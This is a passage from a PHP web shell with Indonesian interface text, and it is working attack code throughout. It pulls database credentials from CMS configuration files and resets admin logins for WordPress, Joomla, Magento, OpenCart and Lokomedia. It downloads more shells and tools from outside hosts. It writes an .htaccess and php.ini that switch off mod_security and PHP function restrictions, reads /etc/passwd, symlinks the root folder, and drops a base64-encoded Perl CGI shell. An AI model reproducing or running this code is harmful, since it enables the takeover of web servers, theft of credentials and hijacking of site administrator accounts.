2095. $dbname = ambilkata($config,"db = '","'");
2096. $dbprefix = ambilkata($config,"dbprefix = '","'");
2097. $prefix = $dbprefix."users";
2098. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2099. $db = mysql_select_db($dbname);
2100. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2101. $result = mysql_fetch_array($q);
2102. $id = $result['id'];
2103. $site = ambilkata($config,"sitename = '","'");
2104. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
2105. echo "Config => ".$file_conf."<br>";
2106. echo "CMS => Joomla<br>";
2107. if($site == '') {
2108. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
2109. } else {
2110. echo "Sitename => $site<br>";
2111. }
2112. if(!$update OR !$conn OR !$db) {
2113. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2114. } else {
2115. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2116. }
2117. mysql_close($conn);
2118. } elseif(preg_match("/WordPress/",$config)) {
2119. $dbhost = ambilkata($config,"DB_HOST', '","'");
2120. $dbuser = ambilkata($config,"DB_USER', '","'");
2121. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
2122. $dbname = ambilkata($config,"DB_NAME', '","'");
2123. $dbprefix = ambilkata($config,"table_prefix = '","'");
2124. $prefix = $dbprefix."users";
2125. $option = $dbprefix."options";
2126. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2127. $db = mysql_select_db($dbname);
2128. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
2129. $result = mysql_fetch_array($q);
2130. $id = $result[ID];
2131. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
2132. $result2 = mysql_fetch_array($q2);
2133. $target = $result2[option_value];
2134. if($target == '') {
2135. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2136. } else {
2137. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
2138. }
2139. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
2140. echo "Config => ".$file_conf."<br>";
2141. echo "CMS => Wordpress<br>";
2142. echo $url_target;
2143. if(!$update OR !$conn OR !$db) {
2144. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2145. } else {
2146. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2147. }
2148. mysql_close($conn);
2149. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
2150. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
2151. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
2152. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
2153. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
2154. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
2155. $prefix = $dbprefix."admin_user";
2156. $option = $dbprefix."core_config_data";
2157. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2158. $db = mysql_select_db($dbname);
2159. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2160. $result = mysql_fetch_array($q);
2161. $id = $result[user_id];
2162. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
2163. $result2 = mysql_fetch_array($q2);
2164. $target = $result2[value];
2165. if($target == '') {
2166. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2167. } else {
2168. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
2169. }
2170. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2171. echo "Config => ".$file_conf."<br>";
2172. echo "CMS => Magento<br>";
2173. echo $url_target;
2174. if(!$update OR !$conn OR !$db) {
2175. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2176. } else {
2177. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2178. }
2179. mysql_close($conn);
2180. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
2181. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
2182. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
2183. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
2184. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
2185. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
2186. $prefix = $dbprefix."user";
2187. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2188. $db = mysql_select_db($dbname);
2189. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
2190. $result = mysql_fetch_array($q);
2191. $id = $result[user_id];
2192. $target = ambilkata($config,"HTTP_SERVER', '","'");
2193. if($target == '') {
2194. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2195. } else {
2196. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
2197. }
2198. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
2199. echo "Config => ".$file_conf."<br>";
2200. echo "CMS => OpenCart<br>";
2201. echo $url_target;
2202. if(!$update OR !$conn OR !$db) {
2203. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2204. } else {
2205. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2206. }
2207. mysql_close($conn);
2208. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
2209. $dbhost = ambilkata($config,'server = "','"');
2210. $dbuser = ambilkata($config,'username = "','"');
2211. $dbpass = ambilkata($config,'password = "','"');
2212. $dbname = ambilkata($config,'database = "','"');
2213. $prefix = "users";
2214. $option = "identitas";
2215. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
2216. $db = mysql_select_db($dbname);
2217. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
2218. $result = mysql_fetch_array($q);
2219. $target = $result[alamat_website];
2220. if($target == '') {
2221. $target2 = $result[url];
2222. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2223. if($target2 == '') {
2224. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
2225. } else {
2226. $cek_login3 = file_get_contents("$target2/adminweb/");
2227. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
2228. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
2229. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
2230. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
2231. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
2232. } else {
2233. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2234. }
2235. }
2236. } else {
2237. $cek_login = file_get_contents("$target/adminweb/");
2238. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
2239. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
2240. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
2241. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
2242. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
2243. } else {
2244. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
2245. }
2246. }
2247. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
2248. echo "Config => ".$file_conf."<br>";
2249. echo "CMS => Lokomedia<br>";
2250. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
2251. echo $url_target2;
2252. } else {
2253. echo $url_target;
2254. }
2255. if(!$update OR !$conn OR !$db) {
2256. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
2257. } else {
2258. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
2259. }
2260. mysql_close($conn);
2261. }
2262. }
2263. }
2264. } else {
2265. echo "<center>
2266. <h1>Auto Edit User Config</h1>
2267. <form method='post'>
2268. DIR Config: <br>
2269. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
2270. Set User & Pass: <br>
2271. <input type='text' name='user_baru' value='bahari' placeholder='user_baru'><br>
2272. <input type='text' name='pass_baru' value='bahari' placeholder='pass_baru'><br>
2273. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
2274. </form>
2275. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
2276. ";
2277. }
2278. }
2279. elseif($_GET['do'] == 'adminer') {
2280. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2281. function adminer($url, $isi) {
2282. $fp = fopen($isi, "w");
2283. $ch = curl_init();
2284. curl_setopt($ch, CURLOPT_URL, $url);
2285. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2286. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2287. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2288. curl_setopt($ch, CURLOPT_FILE, $fp);
2289. return curl_exec($ch);
2290. curl_close($ch);
2291. fclose($fp);
2292. ob_flush();
2293. flush();
2294. }
2295. if(file_exists('sql.php')) {
2296. echo "<center><font color=lime><a href='$full/sql.php' target='_blank'>adminer login</a></font></center>";
2297. } else {
2298. if(adminer("http://pastebin.com/raw/EzJmmzXt","sql.php")) {
2299. echo "<center><font color=lime><a href='$full/sql.php' target='_blank'>-> adminer login <-</a></font></center>";
2300. } else {
2301. echo "<center><font color=red>gagal buat file adminer</font></center>";
2302. }
2303. }
2304.  
2305. }
2306. elseif($_GET['do'] == 'ac') {
2307. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
2308. function adminer($url, $isi) {
2309. $fp = fopen($isi, "w");
2310. $ch = curl_init();
2311. curl_setopt($ch, CURLOPT_URL, $url);
2312. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
2313. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
2314. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
2315. curl_setopt($ch, CURLOPT_FILE, $fp);
2316. return curl_exec($ch);
2317. curl_close($ch);
2318. fclose($fp);
2319. ob_flush();
2320. flush();
2321. }
2322. if(file_exists('sql.php')) {
2323. echo "<center><font color=lime>Done ac.zip</font></center>";
2324. } else {
2325. if(adminer("http://hbd-denita.hol.es/ac.zip","ac.zip")) {
2326. echo "<center><font color=lime>Done ac.zip</font></center>";
2327. } else {
2328. echo "<center><font color=red>gagal</font></center>";
2329. }
2330. }
2331.  
2332. }
2333. elseif($_GET['do'] == 'server') {
2334. echo "<br><center><span style='font-size:30px; font-family:Fredericka the Great; color:white'>Server Security Informations</span><center><br>";
2335. echo "<center><div class='tmpe'>
2336. <table align='center' width='50%'><td><font color='white'>Kernel Version</font></td><td>";echo php_uname();
2337. echo "<tr><td><font color='white'>Web Server</font></td><td>";echo $_SERVER["SERVER_SOFTWARE"];
2338. echo "<tr><td><font color='white'>PHP Version</font></td><td>";echo phpversion(); echo " on "; echo php_sapi_name();
2339. echo "<tr><td><font color='white'>Current User</font></td><td>";echo get_current_user();
2340. echo "<tr><td><font color='white'>User ID</font></td><td>";echo getmyuid();
2341. echo "<tr><td><font color='white'>Group</font></td><td>";echo getmygid();
2342. echo "<tr><td><font color='white'>Cwd </font></td><td>";echo getcwd();
2343. echo "<tr><td><font color='white'>Admin Server</font></td><td>";echo $_SERVER['SERVER_ADMIN'];
2344. echo "<tr><td><font color='white'>Server Port</font></td><td>";echo $_SERVER['SERVER_PORT'];
2345. echo "<tr><td><font color='white'>Server IP</font></td><td>";echo $serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
2346. echo "<tr><td><font color='white'>Client IP</font></td><td>";echo $_SERVER['REMOTE_ADDR'];
2347. echo "<tr><td><font color='white'>cURL support</font></td><td>";echo function_exists('curl_version')?'Enabled':"<font color='red'>No</font>";
2348. echo "<tr><td><font color='white'>Readable /etc/passwd</font></td><td>";echo @is_readable('/etc/passwd')?"Readable</a>":"<font color='red'>Not Readable</font>";
2349. echo "<tr><td><font color='white'>Readable /etc/shadow</font></td><td>";echo @is_readable('/etc/shadow')?"Readable":"<font color='red'>Not Readable</font>";
2350. $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON <font color='white'>secure</font>":"OFF <font color='red'>not secure</font>";
2351. echo "<tr><td><font color='white'>Open Base Dir</font></td><td><font class=txt>" . $base . "</font>";
2352. echo "</table></div></center><br>";
2353. }
2354. elseif($_GET['do'] == 'baipas') {
2355. echo "<center>";
2356. echo "<ul>";
2357. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2358. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2359. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2360. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2361. echo "<li> <a href='?dir=$dir&do=beesem'>Bypass Safe Mode</a> </li>";
2362. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2363. echo "</ul>";
2364. echo "</center>";
2365. }
2366. elseif($_GET['do'] == 'beesem') {
2367.  
2368. echo "<center>";
2369. echo "<ul>";
2370. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2371. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2372. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2373. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2374. echo "<li> <a href='?dir=$dir&do=beesem'>Bypass Safe Mode</a> </li>";
2375. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2376. echo "</ul>";
2377. echo "</center>";
2378.  
2379. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Bypass SafeMode 2014 Priv8</span><br>Coded by Mauritania Attacker<center><br><br>';
2380. echo "<br><form method='POST'>
2381. <center><font color='#007700' size='2' face='shell'>Cwd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</font><input type='text' size='40' name='zero' value=".dirname(__FILE__)." &lt;font color='#b0b000' size='8' face='Tahoma'></font></center>
2382. <center><font color='#007700' size='2' face='shell'>Shell&nbsp;&nbsp;&nbsp;&nbsp;</font><input type='text' size='40' name='shell' value='http://pastebin.com/raw.php?i=2gmt5XFH' &lt;font color='#b0b000' size='8' face='Tahoma'></font></center>
2383. <center><font color='#007700' size='2' face='shell'>ini.php&nbsp;</font><input type='text' size='40' name='rim' value='http://pastebin.com/raw.php?i=sEbXwVvt' &lt;font color='#b0b000' size='8' face='Tahoma'></font></center><br>
2384. <center><input type='submit' value='Bypass SafeMode' name='start' ><br></font></center><br>";
2385. echo "<center> <textarea name='script' style='width: 450px; height: 200px;'>Results Will Appear Here ^_^
2386. ";
2387. if($_POST['start']) {
2388. $zero = $_POST['zero'];
2389. $file = $_POST['shell'];
2390. $mauritania = $_POST['rim'];
2391. $htaccess = "<IfModule mod_security.c>
2392. SecFilterEngine Off
2393. SecFilterScanPOST Off
2394. SecFilterCheckURLEncoding Off
2395. SecFilterCheckCookieFormat Off
2396. SecFilterCheckUnicodeEncoding Off
2397. SecFilterNormalizeCookies Off
2398. </IfModule>
2399. <Limit GET POST>
2400. order deny,allow
2401. deny from all
2402. allow from all
2403. </Limit>
2404. <Limit PUT DELETE>
2405. order deny,allow
2406. deny from all
2407. </Limit>
2408. SetEnv PHPRC $zero/ghost/php.ini";
2409.  
2410. $phpini = "c2FmZV9tb2RlID0gT0ZGDQpTYWZlX21vZGVfZ2lkID0gT0ZGDQpkaXNhYmxlX2Z1bmN0aW9ucyA9IE5PTkUNCmRpc2FibGVfY2xhc3NlcyA9IE5PTkUNCm9wZW5fYmFzZWRpciA9IE9GRg0Kc3Vob3Npbi5leGVjdXRvci5mdW5jLmJsYWNrbGlzdCA9IE5PTkU=";
2411. $dir = "ghost";
2412. if(file_exists($dir)) {
2413. echo "[+] ghost Folder Already Exist are you drunk :o xD !
2414. ";
2415. } else {
2416. @mkdir($dir); {
2417. echo "[+] ghost Folder Has Been Created Nygga :3 !
2418. ";
2419. } }
2420. #Generate Sh3LL
2421. $fopen = fopen("ghost/priv8.php5",'w');
2422. $shell = @file_get_contents($file);
2423. $swrite = fwrite($fopen ,$shell);
2424. if($swrite){
2425. echo "Shell Has Been Downloaded : $zero/ghost/priv8.php5
2426. ";
2427. } else {
2428. echo "Can't Download Shell :( do it manually :D
2429. ";
2430. }
2431. fclose($fopen);
2432. #Generate Htaccess
2433. $kolsv = fopen("ghost/.htaccess", "w");
2434. $hwrite = fwrite($kolsv, $htaccess);
2435. if($hwrite){
2436. echo ".htaccess Generated Successfully \!/";
2437. } else {
2438. echo "Can't Generate Htaccess";
2439. }
2440. fclose($kolsv);
2441. #Generate ini.php
2442. $xopen = fopen("ghost/ini.php",'w');
2443. $rim = @file_get_contents($mauritania);
2444. $zzz = fwrite($xopen ,$rim);
2445. if($zzz){
2446. echo "ini.php Has Been Downloaded \!/";
2447. } else {
2448. echo "Can't Download ini.php :( do it manually :D ";
2449. }
2450. fclose($xopen);
2451.  
2452. $ini = fopen("ghost/php.ini" ,"w");
2453. $php = fwrite($ini, base64_decode($phpini));
2454. if($php){
2455. echo "PHP.INI Generated Successfully \!/";
2456. } else {
2457. echo "[-] Can't Generate PHP.INI";
2458. }
2459. }
2460. echo "</textarea></center>";
2461.  
2462. }
2463. elseif($_GET['do'] == 'baus') {
2464. echo "<center>";
2465. echo "<ul>";
2466. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2467. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2468. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2469. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2470. echo "<li> <a href='?dir=$dir&do=beesem'>Bypass Safe Mode</a> </li>";
2471. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2472. echo "</ul>";
2473. echo "</center>";
2474. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Bypass Users Server Priv8</span><br>Coded By Mauritania Attacker<center><br><br>';
2475. echo '
2476. <div class="tul"><font color="ee5500" face="Tahoma, Geneva, sans-serif" style="font-size: 8pt">
2477.  
2478. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with awk program
2479. <form method="post">
2480. <input type="submit" value="Bypass" name="awk">
2481. </form>
2482. </center>
2483. </p>
2484.  
2485.  
2486.  
2487. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with System Function
2488. <form method="post">
2489. <input type="submit" value="Bypass" name="syst">
2490. </form>
2491. </center>
2492. </p>
2493.  
2494. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with Passthru Function
2495. <form method="post">
2496. <input type="submit" value="Bypass" name="passth">
2497. </form>
2498. </center>
2499. </p>
2500.  
2501. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with exec Function
2502. <form method="post">
2503. <input type="submit" value="Bypass" name="ex">
2504. </form>
2505. </center>
2506. </p>
2507.  
2508. <p><center><font face="Tahoma" color="#007700" size="2pt">Bypass with shell_exec Function
2509. <form method="post">
2510. <input type="submit" value="Bypass" name="shex">
2511. </form>
2512. </center><br>
2513. </p><center>';
2514.  
2515.  
2516. //Awk Program //
2517. if ($_POST['awk']) {
2518. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2519. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
2520. echo "</textarea><br>";
2521. echo "
2522. <br>
2523. <b>
2524. </b>
2525. <br>
2526. ";
2527. }
2528. echo "</center><center>";
2529.  
2530. //System Function //
2531. if ($_POST['syst']) {
2532. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2533. echo system("ls /var/mail");
2534. echo "</textarea><br>";
2535. echo "
2536. <br>
2537. <b>
2538. </b>
2539. <br>
2540. ";
2541. }
2542.  
2543. echo "</center><center>";
2544.  
2545. //Passthru Function //
2546. if ($_POST['passth']) {
2547. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2548. echo passthru("ls /var/mail");
2549. echo "</textarea><br>";
2550. echo "
2551. <br>
2552. <b>
2553. </b>
2554. <br>
2555. ";
2556. }
2557. echo "</center><center>";
2558.  
2559. //exec Function //
2560. if ($_POST['ex']) {
2561. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2562. echo exec("ls /var/mail");
2563. echo "</textarea><br>";
2564. echo "
2565. <br>
2566. <b>
2567.  
2568. </b>
2569. <br>
2570. ";
2571. }
2572.  
2573. echo "</center><center>";
2574.  
2575. //exec Function //
2576. if ($_POST['shex']) {
2577. echo"<textarea style='width: 543px; height: 420px;' class='area' cols='65' rows='15'>";
2578. echo shell_exec("ls /var/mail");
2579. echo "</textarea><br>";
2580. echo "
2581. <br>
2582. <b>
2583. </b>
2584. <br>
2585. ";
2586. }
2587.  
2588. }
2589. elseif($_GET['do'] == 'barut') {
2590. echo "<center>";
2591. echo "<ul>";
2592. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2593. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2594. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2595. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2596. echo "<li> <a href='?dir=$dir&do=beesem'>Bypass Safe Mode</a> </li>";
2597. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2598. echo "</ul>";
2599. echo "</center>";
2600. echo '<br><center><span style="font-size:30px; font-family:Fredericka the Great; color:#009900">Bypass Root Path with system function</span><center><br>';
2601. mkdir('bforb', 0755);
2602. chdir('bforb');
2603. $bforb = 'PGhlYWQ+PHRpdGxlPkJ5cGFzcyBCeXBhc3MgUm9vdCBQYXRoIGJ5IGRlbml0YSBXb3JtPC90aXRsZT48L2hlYWQ+PGxpbmsgcmVsPSJzaG9ydGN1dCBpY29uIiBocmVmPSJodHRwOi8vd3d3Lmljb25qLmNvbS9pY28vYy91L2N1MWJtcGdiMWsuaWNvIiB0eXBlPSJpbWFnZS94LWljb24iIC8+PHN0eWxlIHR5cGU9InRleHQvY3NzIj48IS0tIGJvZHkge2JhY2tncm91bmQtY29sb3I6IHRyYW5zcGFyZW50OyBmb250LWZhbWlseTpDb3VyaWVyCW1hcmdpbi1sZWZ0OiAwcHg7IG1hcmdpbi10b3A6IDBweDsgdGV4dC1hbGlnbjogY2VudGVyOyBOZXc7Zm9udC1zaXplOjEycHg7Y29sb3I6IzAwOTkwMDtmb250LXdlaWdodDo0MDA7fSBhe3RleHQtZGVjb3JhdGlvbjpub25lO30gYTpsaW5rIHtjb2xvcjojMDA5OTAwO30gYTp2aXNpdGVkIHtjb2xvcjojMDA3NzAwO30gYTpob3Zlcntjb2xvcjojMDBmZjAwO30gYTphY3RpdmUge2NvbG9yOiMwMDk5MDA7fSAtLT48IS0tIE1hZGUgQnkgZGVuaXRhIFdvcm0gLS0+PC9zdHlsZT48YnI+PGJyPjxib2R5IGJnQ29sb3I9IjAwMDAwMCI+PHRyPjx0ZD48P3BocCBlY2hvICI8Zm9ybSBtZXRob2Q9J1BPU1QnIGFjdGlvbj0nJz4iIDsgZWNobyAiPGNlbnRlcj48aW5wdXQgdHlwZT0nc3VibWl0JyB2YWx1ZT0nQnlwYXNzIGl0JyBuYW1lPSdkZW5pdGEnPjwvY2VudGVyPiI7IGlmIChpc3NldCgkX1BPU1RbJ2Rlbml0YSddKSl7IHN5c3RlbSgnbG4gLXMgLyBkZW5pdGEudHh0Jyk7ICRmdmNrZW0gPSdUM0IwYVc5dWN5QkpibVJsZUdWeklFWnZiR3h2ZDFONWJVeHBibXR6RFFwRWFYSmxZM1J2Y25sSmJtUmxlQ0J6YzNOemMzTXVhSFJ0RFFwQlpHUlVlWEJsSUhSNGRDQXVjR2h3RFFwQlpHUklZVzVrYkdWeUlIUjRkQ0F1Y0dodyc7JGZpbGUgPSBmb3BlbigiLmh0YWNjZXNzIiwidysiKTskd3JpdGUgPSBmd3JpdGUgKCRmaWxlICxiYXNlNjRfZGVjb2RlKCRmdmNrZW0pKTskZGVuaXRhID0gc3ltbGluaygiLyIsImRlbml0YS50eHQiKTskcnQ9Ijxicj48YSBocmVmPWRlbml0YS50eHQgVEFSR0VUPSdfYmxhbmsnPjxmb250IGNvbG9yPSMwMGJiMDAgc2l6ZT0yIGZhY2U9J0NvdXJpZXIgTmV3Jz48Yj5CeXBhc3NlZCBTdWNjZXNzZnVsbHk8L2I+PC9mb250PjwvYT4iO2VjaG8gIjxicj48YnI+PGI+RG9uZS4uICE8L2I+PGJyPjxicj5DaGVjayBsaW5rIGdpdmVuIGJlbG93IGZvciAvIGZvbGRlciBzeW1saW5rIDxicj4kcnQ8L2NlbnRlcj4iO30gZWNobyAiPC9mb3JtPiI7ICA/PjwvdGQ+PC90cj48L2JvZHk+PC9odG1sPg==';
2604.  
2605. $file = fopen("bforb.php" ,"w+");
2606. $write = fwrite ($file ,base64_decode($bforb));
2607. fclose($file);
2608. chmod("bforb.php",0755);
2609. echo "<iframe src=bforb/bforb.php width=60% height=60% frameborder=0></iframe>";
2610.  
2611. }
2612. elseif($_GET['do'] == 'baper') {
2613. echo "<center>";
2614. echo "<ul>";
2615. echo "<li> <a href='?dir=$dir&do=betc'>Bypass /etc/passwd</a> </li>";
2616. echo "<li> <a href='?dir=$dir&do=baus'>Bypass User Server</a> </li>";
2617. echo "<li> <a href='?dir=$dir&do=baper'>Bypass Perl Security</a> </li>";
2618. echo "<li> <a href='?dir=$dir&do=barut'>Bypass Root Access</a> </li>";
2619. echo "<li> <a href='?dir=$dir&do=beesem'>Bypass Safe Mode</a> </li>";
2620. echo "<li> <a href='?dir=$dir&do=com64'>Base64 Command</a> </li>";
2621. echo "</ul>";
2622. echo "</center>";
2623. mkdir('cgipl', 0755);
2624. chdir('cgipl');
2625. $kokdosya = ".htaccess";
2626. $dosya_adi = "$kokdosya";
2627. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
2628. $metin = "AddType application/x-httpd-cgi .root
2629. AddType application/x-httpd-cgi .root
2630. AddHandler cgi-script .root
2631. AddHandler cgi-script .root";
2632. fwrite ( $dosya , $metin ) ;
2633. fclose ($dosya);
2634. $cgipl = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5Bbm9uR2hvc3QgUGVybCBzaGVsbDwvYj4gIyBzZXJ2ZXINCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyDQojIHZhbHVlcyBzaG91bGQgd29yayBmaW5lIGZvciBtb3N0IHN5c3RlbXMuDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQokUGFzc3dvcmQgPSAiZ2hvc3QiOwkJIyBDaGFuZ2UgdGhpcy4gWW91IHdpbGwgbmVlZCB0byBlbnRlciB0aGlzDQoJCQkJIyB0byBsb2dpbi4NCg0KJFdpbk5UID0gMDsJCQkjIFlvdSBuZWVkIHRvIGNoYW5nZSB0aGUgdmFsdWUgb2YgdGhpcyB0byAxIGlmDQoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQNCgkJCQkjIG1hY2hpbmUuIElmIHlvdSdyZSBydW5uaW5nIGl0IG9uIFVuaXgsIHlvdQ0KCQkJCSMgY2FuIGxlYXZlIHRoZSB2YWx1ZSBhcyBpdCBpcy4NCg0KJE5UQ21kU2VwID0gIiYiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB1c2VkIHRvIHNlcGVyYXRlIDIgY29tbWFuZHMNCgkJCQkjIGluIGEgY29tbWFuZCBsaW5lIG9uIFdpbmRvd3MgTlQuDQoNCiRVbml4Q21kU2VwID0gIjsiOwkJIyBUaGlzIGNoYXJhY3RlciBpcyB